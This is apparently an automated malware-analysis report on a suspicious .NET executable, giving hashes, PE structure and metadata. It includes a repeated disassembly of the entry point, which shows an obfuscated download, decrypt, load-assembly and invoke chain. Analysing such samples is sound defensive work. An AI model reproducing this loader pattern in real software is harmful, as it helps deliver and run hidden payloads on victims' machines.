Suspicious
Suspect

4cd1d0541ccdc209f7c170619e188c0c

PE Executable
|
MD5: 4cd1d0541ccdc209f7c170619e188c0c
|
Size: 60.42 KB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Medium

Hash
 Hash Value
MD5
4cd1d0541ccdc209f7c170619e188c0c
Sha1
b31960bbc74ecfa75dd698c762b177babf8b0e66
Sha256
2e685c9a958286d812c049791bc376bfea13d997b790530fc29b0528a9242cbb
Sha384
114295f59d6e84e3db4ae09e5fe23ef26b5ea0e4e72f2dd16950a15d376fa10dc1956ab900f824a684a7cbd9846c21f5
Sha512
bde423dffee0bc499677de8186e180a4abc89b240b7ad2ba2b778b403014f639396891d031ad2bd7d1cb05c0cf8b147dd7338c171a7e43c351be7843675fb3f8
SSDeep
1536:9SSCObS8gxff2vWhSZlouL00mKYGe8QNKuzTM:9S5KfW+ehSZyuL00mKY3NL0
TLSH
4F434A0CA799FA15D63C497EC4F14300E3B5D6956503FB7FADC0A86D98C23FA1602A8B

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
4cd1d0541ccdc209f7c170619e188c0c
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
XQVhn
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

Jdahvqpvhpz.exe
Full Name

Jdahvqpvhpz.exe
EntryPoint

System.Void Ctwuwupp.Xdptg::Main()
Scope Name

Jdahvqpvhpz.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Jdahvqpvhpz
Assembly Version

1.0.1525.20223
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.6
Total Strings

11
Main Method

System.Void Ctwuwupp.Xdptg::Main()
Main IL Instruction Count

89
Main IL

newobj System.Void Ctwuwupp.Xdptg/a::.ctor() stloc.0 <null> br.s IL_0035: ldc.i4.s 38 ldc.i4 30209 call System.String i::a(System.Int32) stloc.1 <null> br.s IL_003D: ldc.i4.s -37 ldc.i4 30621 call System.String i::a(System.Int32) stloc.2 <null> br.s IL_0045: ldc.i4.s 80 ldsfld System.Func`1<System.Byte[]> Ctwuwupp.Xdptg/<>c::<>9__0_0 dup <null> brfalse.s IL_002D: ldc.i4.0 ldc.i4.1 <null> br.s IL_0030: brtrue.s IL_0061 ldc.i4.0 <null> br.s IL_0030: brtrue.s IL_0061 brtrue.s IL_0061: newobj System.Void Ctwuwupp.Edymvvbabv::.ctor(System.Func`1<System.Byte[]>) pop <null> br.s IL_004B: ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldc.i4.s 38 ldc.i4.s -125 bgt.s IL_0008: ldc.i4 30209 br.s IL_004B: ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldc.i4.s -37 ldc.i4.s -7 blt.s IL_0015: ldc.i4 30621 br.s IL_004B: ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldc.i4.s 80 ldc.i4.s 23 bgt.s IL_0022: ldsfld System.Func`1<System.Byte[]> Ctwuwupp.Xdptg/<>c::<>9__0_0 ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldftn System.Byte[] Ctwuwupp.Xdptg/<>c::a() newobj System.Void System.Func`1<System.Byte[]>::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Func`1<System.Byte[]> Ctwuwupp.Xdptg/<>c::<>9__0_0 newobj System.Void Ctwuwupp.Edymvvbabv::.ctor(System.Func`1<System.Byte[]>) ldloc.0 <null> ldloc.1 <null> ldloc.2 <null> newobj System.Void Ctwuwupp.Pdgviblx::.ctor(System.String,System.String) stfld Ctwuwupp.Pdgviblx Ctwuwupp.Xdptg/a::a ldloc.0 <null> newobj System.Void Ctwuwupp.Nthqih::.ctor() stfld Ctwuwupp.Nthqih Ctwuwupp.Xdptg/a::b ldloc.0 <null> ldc.i4 30634 call System.String i::a(System.Int32) ldc.i4 30714 call System.String i::a(System.Int32) newobj System.Void Ctwuwupp.Trresb::.ctor(System.String,System.String) stfld Ctwuwupp.Trresb Ctwuwupp.Xdptg/a::c dup <null> ldloc.0 <null> ldftn System.Void Ctwuwupp.Xdptg/a::a(System.IO.MemoryStream) newobj System.Void System.Action`1<System.IO.MemoryStream>::.ctor(System.Object,System.IntPtr) callvirt System.Void Ctwuwupp.Edymvvbabv::add_DownloadCompleted(System.Action`1<System.IO.MemoryStream>) ldloc.0 <null> ldfld Ctwuwupp.Pdgviblx Ctwuwupp.Xdptg/a::a ldloc.0 <null> ldftn System.Void Ctwuwupp.Xdptg/a::b(System.IO.MemoryStream) newobj System.Void System.Action`1<System.IO.MemoryStream>::.ctor(System.Object,System.IntPtr) callvirt System.Void Ctwuwupp.Pdgviblx::add_DecryptionCompleted(System.Action`1<System.IO.MemoryStream>) ldloc.0 <null> ldfld Ctwuwupp.Nthqih Ctwuwupp.Xdptg/a::b ldloc.0 <null> ldftn System.Void Ctwuwupp.Xdptg/a::c(System.Reflection.Assembly) newobj System.Void System.Action`1<System.Reflection.Assembly>::.ctor(System.Object,System.IntPtr) callvirt System.Void Ctwuwupp.Nthqih::add_LoadCompleted(System.Action`1<System.Reflection.Assembly>) ldloc.0 <null> ldfld Ctwuwupp.Trresb Ctwuwupp.Xdptg/a::c ldsfld System.Action Ctwuwupp.Xdptg/<>c::<>9__0_4 dup <null> brfalse.s IL_00EE: ldc.i4.0 ldc.i4.1 <null> br.s IL_00F1: brtrue.s IL_010A ldc.i4.0 <null> br.s IL_00F1: brtrue.s IL_010A brtrue.s IL_010A: callvirt System.Void Ctwuwupp.Trresb::add_InvocationCompleted(System.Action) pop <null> ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldftn System.Void Ctwuwupp.Xdptg/<>c::b() newobj System.Void System.Action::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Action Ctwuwupp.Xdptg/<>c::<>9__0_4 callvirt System.Void Ctwuwupp.Trresb::add_InvocationCompleted(System.Action) callvirt System.Void Ctwuwupp.Edymvvbabv::Zuowogw() ret <null>
Module Name

Jdahvqpvhpz.exe
Full Name

Jdahvqpvhpz.exe
EntryPoint

System.Void Ctwuwupp.Xdptg::Main()
Scope Name

Jdahvqpvhpz.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Jdahvqpvhpz
Assembly Version

1.0.1525.20223
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.6
Total Strings

11
Main Method

System.Void Ctwuwupp.Xdptg::Main()
Main IL Instruction Count

89
Main IL

newobj System.Void Ctwuwupp.Xdptg/a::.ctor() stloc.0 <null> br.s IL_0035: ldc.i4.s 38 ldc.i4 30209 call System.String i::a(System.Int32) stloc.1 <null> br.s IL_003D: ldc.i4.s -37 ldc.i4 30621 call System.String i::a(System.Int32) stloc.2 <null> br.s IL_0045: ldc.i4.s 80 ldsfld System.Func`1<System.Byte[]> Ctwuwupp.Xdptg/<>c::<>9__0_0 dup <null> brfalse.s IL_002D: ldc.i4.0 ldc.i4.1 <null> br.s IL_0030: brtrue.s IL_0061 ldc.i4.0 <null> br.s IL_0030: brtrue.s IL_0061 brtrue.s IL_0061: newobj System.Void Ctwuwupp.Edymvvbabv::.ctor(System.Func`1<System.Byte[]>) pop <null> br.s IL_004B: ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldc.i4.s 38 ldc.i4.s -125 bgt.s IL_0008: ldc.i4 30209 br.s IL_004B: ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldc.i4.s -37 ldc.i4.s -7 blt.s IL_0015: ldc.i4 30621 br.s IL_004B: ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldc.i4.s 80 ldc.i4.s 23 bgt.s IL_0022: ldsfld System.Func`1<System.Byte[]> Ctwuwupp.Xdptg/<>c::<>9__0_0 ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldftn System.Byte[] Ctwuwupp.Xdptg/<>c::a() newobj System.Void System.Func`1<System.Byte[]>::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Func`1<System.Byte[]> Ctwuwupp.Xdptg/<>c::<>9__0_0 newobj System.Void Ctwuwupp.Edymvvbabv::.ctor(System.Func`1<System.Byte[]>) ldloc.0 <null> ldloc.1 <null> ldloc.2 <null> newobj System.Void Ctwuwupp.Pdgviblx::.ctor(System.String,System.String) stfld Ctwuwupp.Pdgviblx Ctwuwupp.Xdptg/a::a ldloc.0 <null> newobj System.Void Ctwuwupp.Nthqih::.ctor() stfld Ctwuwupp.Nthqih Ctwuwupp.Xdptg/a::b ldloc.0 <null> ldc.i4 30634 call System.String i::a(System.Int32) ldc.i4 30714 call System.String i::a(System.Int32) newobj System.Void Ctwuwupp.Trresb::.ctor(System.String,System.String) stfld Ctwuwupp.Trresb Ctwuwupp.Xdptg/a::c dup <null> ldloc.0 <null> ldftn System.Void Ctwuwupp.Xdptg/a::a(System.IO.MemoryStream) newobj System.Void System.Action`1<System.IO.MemoryStream>::.ctor(System.Object,System.IntPtr) callvirt System.Void Ctwuwupp.Edymvvbabv::add_DownloadCompleted(System.Action`1<System.IO.MemoryStream>) ldloc.0 <null> ldfld Ctwuwupp.Pdgviblx Ctwuwupp.Xdptg/a::a ldloc.0 <null> ldftn System.Void Ctwuwupp.Xdptg/a::b(System.IO.MemoryStream) newobj System.Void System.Action`1<System.IO.MemoryStream>::.ctor(System.Object,System.IntPtr) callvirt System.Void Ctwuwupp.Pdgviblx::add_DecryptionCompleted(System.Action`1<System.IO.MemoryStream>) ldloc.0 <null> ldfld Ctwuwupp.Nthqih Ctwuwupp.Xdptg/a::b ldloc.0 <null> ldftn System.Void Ctwuwupp.Xdptg/a::c(System.Reflection.Assembly) newobj System.Void System.Action`1<System.Reflection.Assembly>::.ctor(System.Object,System.IntPtr) callvirt System.Void Ctwuwupp.Nthqih::add_LoadCompleted(System.Action`1<System.Reflection.Assembly>) ldloc.0 <null> ldfld Ctwuwupp.Trresb Ctwuwupp.Xdptg/a::c ldsfld System.Action Ctwuwupp.Xdptg/<>c::<>9__0_4 dup <null> brfalse.s IL_00EE: ldc.i4.0 ldc.i4.1 <null> br.s IL_00F1: brtrue.s IL_010A ldc.i4.0 <null> br.s IL_00F1: brtrue.s IL_010A brtrue.s IL_010A: callvirt System.Void Ctwuwupp.Trresb::add_InvocationCompleted(System.Action) pop <null> ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldftn System.Void Ctwuwupp.Xdptg/<>c::b() newobj System.Void System.Action::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Action Ctwuwupp.Xdptg/<>c::<>9__0_4 callvirt System.Void Ctwuwupp.Trresb::add_InvocationCompleted(System.Action) callvirt System.Void Ctwuwupp.Edymvvbabv::Zuowogw() ret <null>
4cd1d0541ccdc209f7c170619e188c0c (60.42 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙